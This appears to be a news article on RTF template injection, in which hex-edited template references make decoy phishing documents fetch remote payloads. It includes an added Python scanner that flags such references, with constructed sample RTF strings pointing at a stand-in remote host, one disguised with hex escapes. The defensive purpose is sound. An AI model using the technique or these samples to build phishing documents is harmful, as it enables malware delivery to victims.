Threat actors from three countries—China, Russia, India—are using a new method, RTF (Rich Text Format) template injection, to plant malware in targeted systems.
“RTF template injection is a novel technique that is ideal for malicious phishing attachments because it is simple and allows threat actors to retrieve malicious content from a remote URL using an RTF file,” Proofpoint researchers said in a new report shared with The Hacker News.
At the core of the attack is an RTF file containing decoy content that has been altered to retrieve further content, such as malicious payloads, from an external URL. The technique abuses the RTF template feature: the document's formatting properties are edited with a hex editor so that the template reference names a URL resource instead of an accessible local file, and the remote payload is then fetched from that destination.
In other words, attackers can send their targets Microsoft Word documents that look normal but, once downloaded, load malicious code remotely through the template feature and wreak havoc on the target's systems. Because the method is evasive, it proves fairly successful when paired with phishing as the upfront delivery vector.
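The mechanism described above gives defenders a concrete artifact to look for: an RTF template destination whose argument is a network location rather than a local file. The following scanner is an added example written for this article, not a tool from Proofpoint or The Hacker News. It assumes the template reference lives in the standard RTF `{\*\template ...}` destination, resolves the `\'hh` hex escapes that a hex-edited file may use to disguise the URL, and flags references that start with a URL scheme or a UNC prefix. All four sample files are constructed inline; none is a real malicious sample.

```python
import re

# --- Constructed sample RTF files (not real samples from any report) ---
# A template destination that points at a remote URL.
SAMPLE_REMOTE = rb"{\rtf1\ansi{\*\template http://template-host.invalid/t.dotm}Quarterly report\par}"
# The same reference written with RTF hex escapes (\'hh), as a hex-edited file might carry it.
SAMPLE_HEX = rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70://template-host.invalid/t.dotm}Invoice\par}"
# A benign local template reference: in RTF a literal backslash is written as \\.
SAMPLE_LOCAL = rb"{\rtf1\ansi{\*\template C:\\Users\\alice\\Templates\\Normal.dotm}Memo\par}"
# A document with no template destination at all.
SAMPLE_PLAIN = rb"{\rtf1\ansi Hello\par}"

# {\*\template <text>} is the RTF destination that names an attached template.
TEMPLATE_RE = re.compile(rb"\{\\\*\\template\b\s*([^}]*)\}", re.IGNORECASE)
# RTF escapes that may appear inside the destination text: \\ \{ \} and \'hh (hex byte).
ESC_RE = re.compile(rb"\\(\\|\{|\}|'([0-9a-fA-F]{2}))")


def unescape_rtf(raw: bytes) -> bytes:
    """Resolve RTF escapes so an obfuscated template path reads as plain text.

    Limitation (assumption of this example): \\uN unicode escapes are not handled.
    """
    def repl(m):
        if m.group(2) is not None:          # \'hh -> the byte 0xhh
            return bytes([int(m.group(2), 16)])
        return m.group(1)                   # \\ -> \ , \{ -> { , \} -> }
    return ESC_RE.sub(repl, raw).strip()


def is_remote_reference(path: bytes) -> bool:
    """True if the template path names a network resource rather than a local file."""
    lowered = path.lower()
    return lowered.startswith((b"http://", b"https://", b"ftp://", b"file://", b"\\\\"))


def scan_rtf(data: bytes):
    """Return None if the file is not RTF or has no template destination,
    otherwise a dict with the decoded template reference and a remote flag."""
    if not data.lstrip().startswith(b"{\\rtf"):
        return None
    m = TEMPLATE_RE.search(data)
    if not m:
        return None
    template = unescape_rtf(m.group(1))
    return {
        "template": template.decode("latin-1", errors="replace"),
        "remote": is_remote_reference(template),
    }


if __name__ == "__main__":
    for name, blob in [("remote", SAMPLE_REMOTE), ("hex", SAMPLE_HEX),
                       ("local", SAMPLE_LOCAL), ("plain", SAMPLE_PLAIN)]:
        result = scan_rtf(blob)
        if result is None:
            print(f"{name}: no template destination")
        else:
            verdict = "SUSPICIOUS remote template" if result["remote"] else "local template"
            print(f"{name}: {verdict} -> {result['template']}")
```

Run against a mail gateway's attachment quarantine, the remote verdict is the signal worth alerting on; a local template path is normal for documents saved from Word, so only the network-location case needs analyst attention.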
“The innovation by threat actors to bring this method to a new file type in RTFs represents an expanding surface area of threat for organizations worldwide,” the researchers said. “While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape.”